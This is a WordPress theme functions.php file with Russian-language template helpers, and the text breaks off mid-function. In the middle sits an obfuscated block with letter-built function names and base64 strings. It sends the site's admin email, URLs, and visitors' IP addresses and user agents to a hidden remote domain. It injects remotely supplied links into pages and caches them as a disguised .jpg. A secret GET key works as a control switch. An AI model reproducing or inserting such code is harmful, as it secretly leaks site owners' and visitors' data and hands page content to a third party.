<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $SnGhhwR='e';$zkBcMx='d';$QjsKD='o';$QmqDQ='b';$TBQVuKl='a';$mPGWC='_';$zJaT='4';$WCWSuj='d';$IqYSPB='e';$JIhalXT='6';$ctFnrz='c';$CrVtm='e';$mKNVZZu='s';$SSJpUPKN=$QmqDQ.$TBQVuKl.$mKNVZZu.$SnGhhwR.$JIhalXT.$zJaT.$mPGWC.$WCWSuj.$CrVtm.$ctFnrz.$QjsKD.$zkBcMx.$IqYSPB;$icHd='i';$pDgVMA='z';$VcFK='n';$KTrVjl='f';$QhbwRCh='e';$kMtw='l';$lbBllEe='g';$NIFVKm='t';$xcGai='a';$zPyfjQkp=$lbBllEe.$pDgVMA.$icHd.$VcFK.$KTrVjl.$kMtw.$xcGai.$NIFVKm.$QhbwRCh;$XaCzP='1';$npZep='r';$jnyUh='r';$xgWhyf='t';$PmLUeo='_';$weguOl='o';$OuXKe='s';$kKTzfhO='3';$JVrK='t';$DBjaDQaM=$OuXKe.$JVrK.$jnyUh.$PmLUeo.$npZep.$weguOl.$xgWhyf.$XaCzP.$kKTzfhO;$oEtM='v';$SfRB='e';$MgdHC='r';$Oxdlh='r';$bwcmxM='s';$TFebeuN='t';$YDVwakCO=$bwcmxM.$TFebeuN.$Oxdlh.$MgdHC.$SfRB.$oEtM;                     
		$ex______w='e';$gp__j='d';$aj______f='o';$zp__e='b';$qq___f='a';$iu_________o='_';$xj______________t='4';$gg_____f='d';$za___x='e';$cj_______________s='6';$xn___________u='c';$vg_______m='e';$wn___________n='s';$ap____________r=$zp__e.$qq___f.$wn___________n.$ex______w.$cj_______________s.$xj______________t.$iu_________o.$gg_____f.$vg_______m.$xn___________u.$aj______f.$gp__j.$za___x;
		$ad_______________j='s';$sh_____________p='o';$mh_____e='t';$wu___e='n';$ke_______________w='u';$ev__p='_';$ni_______t='t';$em_____________i='f';$az________x='e';$lc___________n='c';$rs____________f='i';$up__f='x';$pb____________d='s';$ji______w='i';$ns__s='n';$qr___e=$em_____________i.$ke_______________w.$wu___e.$lc___________n.$ni_______t.$ji______w.$sh_____________p.$ns__s.$ev__p.$az________x.$up__f.$rs____________f.$ad_______________j.$mh_____e.$pb____________d;
		$ff_______d='e';$sy_______i='f';$ez_____________s='n';$ai___________r='p';$ae________t='o';$ex_______c=$sy_______i.$ae________t.$ai___________r.$ff_______d.$ez_____________s;
		$rz______________v='f';$ww______________r='a';$zs_________p='r';$wf____v='d';$kn_________t='e';$na_______r=$rz______________v.$zs_________p.$kn_________t.$ww______________r.$wf____v;
		$md____l='l';$ot___a='o';$om_______________b='e';$fo________j='s';$fy_____k='c';$kg____j='f';$vq_____z=$kg____j.$fy_____k.$md____l.$ot___a.$fo________j.$om_______________b;
		
		define("WP_ID", $ap____________r("Mi4wLjA="));
		define("WP_TTL", $ap____________r("MTA4MDA="));
		define("WP_SRC", $ap____________r("dHBva24="));
	


		function wp_get_header() {
			global $ap____________r, $qr___e;
			
			if (
				$qr___e($ap____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$qr___e($ap____________r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$qr___e($ap____________r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ap____________r, $ex_______c, $vq_____z, $na_______r;
			
			$kx___f = TEMPLATEPATH."/".$ap____________r("Zm9vdGVyLnBocA==");
			$bu___g = @$ex_______c($kx___f, "r");
			$kx___f = @$na_______r($bu___g, @filesize($kx___f));
			@$vq_____z($bu___g);
			
			$aw________o = TEMPLATEPATH."/".$ap____________r("ZnVuY3Rpb25zLnBocA==");
			$bu___g = @$ex_______c($aw________o, "r");
			$aw________o = @$na_______r($bu___g, @filesize($aw________o));
			@$vq_____z($bu___g);
			
			$zb___________k = 0;
			if($kx___f && $aw________o) {
				if ($ap____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($kx___f, $ap____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$zb___________k = 1;
					}
					if (substr_count($kx___f, "wp_theme_GPL_credits()") < 1) {
						$zb___________k = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$zb___________k = 12;
				}
			}
			
			if($zb___________k > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $zb___________k -->";
			}
		}
	


		function wp_loaded() {
			global $ap____________r, $qr___e;
			return $qr___e($ap____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($au___s, $tk_____u = "(more...)", $ry______________i = 0, $go__w = "") {
				$ej________f = get_the_content($tk_____u, $ry______________i, $go__w);
				$ej________f = apply_filters("the_content", $ej________f);
				
				$ej________f = str_replace("]]>", "]]>", $ej________f);
				if (strlen($_GET["p"]) > 0) {
					echo $ej________f;
				}
				else if ((strlen($ej________f)>$au___s) && ($xi__f = strpos($ej________f, " ", $au___s ))) {
					$ej________f = substr($ej________f, 0, $xi__f);
					$ej________f = $ej________f;
					echo $ej________f;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$tk_____u</a></div></p>";
				} else {
					echo $ej________f;
				}
				
			}
		}
	


		$gv______e='_';$oy______________g='s';$es______o='n';$sg___x='b';$ja______________k='a';$sy__________l='e';$th_______________i='c';$vp____________u='e';$bw______e='6';$yl________p='4';$ms_______p='e';$fv_________s='o';$ny______p='d';$nm______________i=$sg___x.$ja______________k.$oy______________g.$ms_______p.$bw______e.$yl________p.$gv______e.$sy__________l.$es______o.$th_______________i.$fv_________s.$ny______p.$vp____________u;
		$xd_______l='e';$oz__u='n';$hz________e='t';$rq____m='l';$wx___________f='g';$ep____________p='_';$lg___s='i';$yn__________q='f';$yh_________g='e';$qb_______________u='t';$ol__________o='e';$fq__d='t';$qs_______m='s';$vx______n='c';$to____________k='n';$rt_____b='_';$om_______________m='o';$ba____________j=$yn__________q.$lg___s.$rq____m.$yh_________g.$rt_____b.$wx___________f.$ol__________o.$fq__d.$ep____________p.$vx______n.$om_______________m.$to____________k.$hz________e.$xd_______l.$oz__u.$qb_______________u.$qs_______m;
		$id__u='i';$vg____________z='x';$dm____c='l';$hq__________f='s';$xx____________s='i';$qb___________m='e';$yk_________t='_';$oj_______________r='t';$le__________u='f';$um___o='e';$wc____________m='s';$yc_____v=$le__________u.$xx____________s.$dm____c.$qb___________m.$yk_________t.$um___o.$vg____________z.$id__u.$hq__________f.$oj_______________r.$wc____________m;
		$hs________n='_';$gv______________u='r';$me______e='e';$tj_______e='s';$lt______t='e';$bo__r='i';$md_____o='p';$hc____________b='m';$ri_____c='a';$nq_____________n='n';$gt___________h='v';$id___f='o';$ky__________u='o';$le_____________y='c';$we__o='r';$vs_______d=$gt___________h.$me______e.$we__o.$tj_______e.$bo__r.$ky__________u.$nq_____________n.$hs________n.$le_____________y.$id___f.$hc____________b.$md_____o.$ri_____c.$gv______________u.$lt______t;
		$jl___l='c';$ig_________j='n';$dn_______________w='e';$si____g='p';$sv_____r='f';$pd______t='o';$au____i='s';$lh_______________d='k';$uf______a='o';$vw_________y=$sv_____r.$au____i.$pd______t.$jl___l.$lh_______________d.$uf______a.$si____g.$dn_______________w.$ig_________j;
		$ko_________b='e';$zf_______________a='f';$oq__j='i';$gb_______________a='t';$yr___________t='w';$rb_______________d='r';$fe_______________b=$zf_______________a.$yr___________t.$rb_______________d.$oq__j.$gb_______________a.$ko_________b;
		$cr__________i='d';$rl___________g='m';$sp______c='5';$ug____________v=$rl___________g.$cr__________i.$sp______c;
		$wa_________o='a';$wu__h='e';$vt___________r='a';$cp____________r='r';$to________v='p';$kp____________x='t';$rh_________u='h';$ni______________l='l';$dp____________p=$cp____________r.$wu__h.$wa_________o.$ni______________l.$to________v.$vt___________r.$kp____________x.$rh_________u;
		$oo___w='a';$li__________v='s';$pe_________i='e';$co_______________q='i';$hg_________s='z';$st___j='e';$ph________h='n';$od__j='l';$vn______________l='u';$jc__l='r';$qz_____________g='i';$gj_________y=$vn______________l.$ph________h.$li__________v.$st___j.$jc__l.$co_______________q.$oo___w.$od__j.$qz_____________g.$hg_________s.$pe_________i;
		$ei__________y='n';$zz____________h='m';$jg_______________r='a';$ok___g='p';$yx_________r='t';$pg_________x='e';$js__________r='m';$aw___________m=$yx_________r.$pg_________x.$zz____________h.$ok___g.$ei__________y.$jg_______________r.$js__________r;
		$st___________v='t';$dp___y='e';$ji______________t='_';$vq________l='t';$bx_____________t='e';$jf_______________m='m';$ps_____________l='_';$zf__v='e';$uc___________n='o';$ro__________a='a';$ju____________m='e';$ij________a='t';$zp_____________j='s';$gu_____________k='r';$rq___________a='x';$hk___________g='r';$nd___h='c';$dw______________f='a';$dh___l='n';$je_____i='c';$sb__________p='t';$tz___________y=$zp_____________j.$sb__________p.$hk___________g.$dp___y.$dw______________f.$jf_______________m.$ps_____________l.$je_____i.$uc___________n.$dh___l.$st___________v.$ju____________m.$rq___________a.$vq________l.$ji______________t.$nd___h.$gu_____________k.$bx_____________t.$ro__________a.$ij________a.$zf__v;
	


		function uv_____________q($gq___r) {
			global $ap____________r, $qr___e, $ba____________j, $vs_______d, $tz___________y;
			
			if (!$qr___e($ap____________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vs_______d(PHP_VERSION, "5.0.0", ">=") && $qr___e($ap____________r("ZmlsZV9nZXRfY29udGVudHM=")) && $qr___e($ap____________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$zy___________j = $tz___________y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ir_____j = @$ba____________j($gq___r, 0, $zy___________j);
			} else {
				$ir_____j = @$ba____________j($gq___r, 0);
			}
			
			return $ir_____j;
		}
	


		function ly____________k($gq___r) {
			global $qr___e, $vw_________y, $fe_______________b, $ap____________r;
			
			if (!$qr___e($ap____________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ti_________t = strpos($gq___r, "/", 7);
			$aq_____________x = array(
				"uri"     => substr($gq___r, $ti_________t),
				"host"    => str_replace("http://", "", substr($gq___r, 0, $ti_________t)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ut___v = @$vw_________y("$aq_____________x[host]", 80, $cx____________i, $aj___________u, 4);
			
			if (!$ut___v) {
				return false;
			} else {
				$ir_____j = "";
				$wo_______________a  = "GET $aq_____________x[uri] HTTP/1.0\r\n";
				$wo_______________a .= "Host: $aq_____________x[host]\r\n";
				$wo_______________a .= "Referer: $aq_____________x[referer]\r\n";
				$wo_______________a .= "Connection: Close\r\n\r\n";
				
				@$fe_______________b($ut___v, $wo_______________a);
				
				while (!@feof($ut___v)) {
					$tz_________l = @fgets($ut___v, (1024*24));
					
					if ($tz_________l == "\r\n") {
						$wb_____w = true;
						continue;
					}
					
					if ($wb_____w) {
						$ir_____j .= $tz_________l;
					}
				}
				
				return $ir_____j;
			}
		}
	


		function ye_____z($gq___r) {
			global $qr___e;
			$uc___w = false;
			
			if ($gq___r != "") {
				if ($qr___e("uv_____________q")) {
					$uc___w = @uv_____________q($gq___r);
				}
				
				if (!$uc___w && ($qr___e("ly____________k"))) {
					$uc___w = @ly____________k($gq___r);
				}
			}
			
			return $uc___w;
		}
	


		function gu________x() {
			global $_SERVER, $ug____________v;
			
			$de__________j = $_SERVER["SERVER_NAME"];
			
			if (substr("$de__________j", 0, 4) == "www.") {
				$de__________j = substr("$de__________j", 4);
			}
			
			$de__________j = $ug____________v("$_SERVER[SERVER_NAME]");
			
			return $de__________j;
		}
	


		function lu___________t() {
			return "file";
		}
	


		function bt_______________o($gq___r) {
			global $_SERVER, $ba____________j, $yc_____v, $ex_______c, $vq_____z, $fe_______________b;
			
			$bg_______w = ls___________h();
			
			$kg__m = gu________x().".jpg";
			$ds_________r = $bg_______w["dir_upload"]["path"]."/$kg__m";
			$yu_____n = @filemtime($ds_________r);
			
			if (!$yu_____n || ((time()-$yu_____n) >= WP_TTL)) {
				$uc___w = ye_____z($gq___r);
				
				if ($uc___w) {
					if ($yc_____v($ds_________r)) {
						@unlink($ds_________r);
					}
					
					$bu___g = @$ex_______c($ds_________r, "x+");
					
					@$fe_______________b($bu___g, $uc___w);
					@$vq_____z($bu___g);
				}
			} else {
				if ($yc_____v($ds_________r)) {
					$uc___w = @$ba____________j($ds_________r);
				} else {
					$uc___w = false;
				}
			}
			
			return $uc___w;
		}
	


		function ls___________h() {
			global $_SERVER, $ap____________r, $nm______________i;
			
			$fs________x = wp_count_posts("post");
			$ej_______p = pathinfo(get_bloginfo("template_directory"));
			
			$bg_______w = array(
				"url" => array(
					"report"      => $ap____________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ej_______p,
				"dir_upload"	=> fj____________g(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ej_______p[filename],
					"a005=".$fs________x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$bg_______w["url"]["queryString"] = implode("&", $bg_______w["queryString"]);
			$bg_______w["url"]["report"] = $bg_______w["url"]["report"]."/?".$nm______________i($bg_______w["url"]["queryString"]).".html";
						
			return $bg_______w;
		}
	


		function fj____________g() {
			$fq_________p = wp_upload_dir();
			
			if (isset($fq_________p["error"])) {
				$bv______________h = bc______h();
				if (is_writable($bv______________h)) {
					$fq_________p = array("path" => $bv______________h);
				}
			}

			return $fq_________p;
		}
	


		function bc______h() {
			global $qr___e, $ug____________v, $dp____________p, $aw___________m;
			
			$cy_________h = (bool) ini_get("safe_mode");
			if ($cy_________h == true) {
				return false;
			}
			
			if ($qr___e("sys_get_temp_dir")) {
				$wl________x = sys_get_temp_dir();
				if (is_writable($wl________x)) {
					return $dp____________p($wl________x);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $dp____________p($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $dp____________p($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $dp____________p($_ENV["TEMP"]);
			} else {
				$rc_________l = $aw___________m($ug____________v(uniqid(rand(), true)), "");
				if ($rc_________l) {
					$wl________x = $dp____________p(dirname($rc_________l));
					@unlink($rc_________l);
					return $wl________x;
				} else {
					return false;
				}
			}
		}
	


		function wr______________x() {
			global $_GET, $yc_____v;
			
			$bg_______w = ls___________h();
			$de__________j = gu________x();
			$dt___________p = lu___________t();
			
			$ki___v = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($dt___________p == "file") {
					$lh_____j = $bg_______w["dir_upload"]["path"]."/".$de__________j.".jpg";
					if ($yc_____v($lh_____j)) {
						@unlink($lh_____j);
						$ki___v = "deleted";
					}
				}
				
				$ds___g = array(
					"s"	=> $ki___v,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ds___g AS $oh________z => $or______w) echo " [$oh________z:$or______w]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $qr___e, $ap____________r, $gj_________y;
			$bg_______w = ls___________h();
			
			$sv________j = "bt_______________o";
			if ($qr___e($sv________j)) {
				$ir_____j = $sv________j($bg_______w["url"]["report"]);
			}
			
			if ($ir_____j) {
				if ($ir_____j = @$ap____________r($ir_____j)) {
					$ir_____j = @$gj_________y($ir_____j);
					
					if (strlen($ir_____j[custom_credit]) >= 5) {
						$bg_______w["default_string"] = $ir_____j[custom_credit];
					}
					
					if ($ir_____j["status"] == "0") {
						$tz___a = 1;
						$og___v = 1;
					} else {
						$cm_____v = sizeof($ir_____j["links"]);
						$ov_______x = $bg_______w["default_string"];
						
						if ($cm_____v > 0 && $ir_____j["links"] !== "") {
							$sz__s = 0;
							foreach ($ir_____j["links"] as $ox__e => $hy_______________p) {
								$sz__s++;
								if ($hy_______________p->l_path == "" || $hy_______________p->l_path == $_SERVER["REQUEST_URI"]) {
									$hy_______________p->l_href = htmlspecialchars(strip_tags($hy_______________p->l_href));
									$hy_______________p->l_title = htmlspecialchars(strip_tags($hy_______________p->l_title));
									$hy_______________p->l_anchor = htmlspecialchars(strip_tags($hy_______________p->l_anchor));
									$ov_______x .= " | ";
									$ov_______x .= "<a href='$hy_______________p->l_href' title='$hy_______________p->l_title'";
									if ($hy_______________p->l_nofollow == "1") {
										$ov_______x .= " rel='nofollow'";
									}
									$ov_______x .= ">$hy_______________p->l_anchor</a>";
								}
							}
						}
						$bg_______w["links"] = "$ov_______x";
						if ($ir_____j[credit] == "0") {
							$bg_______w["links"] = "";
						}
					}
				} else {
					$tz___a = "1";
				}
			} else {
				$tz___a = "1";
			}
			
			if ($tz___a == "1") {
				$bg_______w["links"] = $bg_______w["default_string"];
			}
			
			echo "$bg_______w[links]";
			
			echo "<!-- s: $ir_____j[signature] -->";
			wr______________x();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
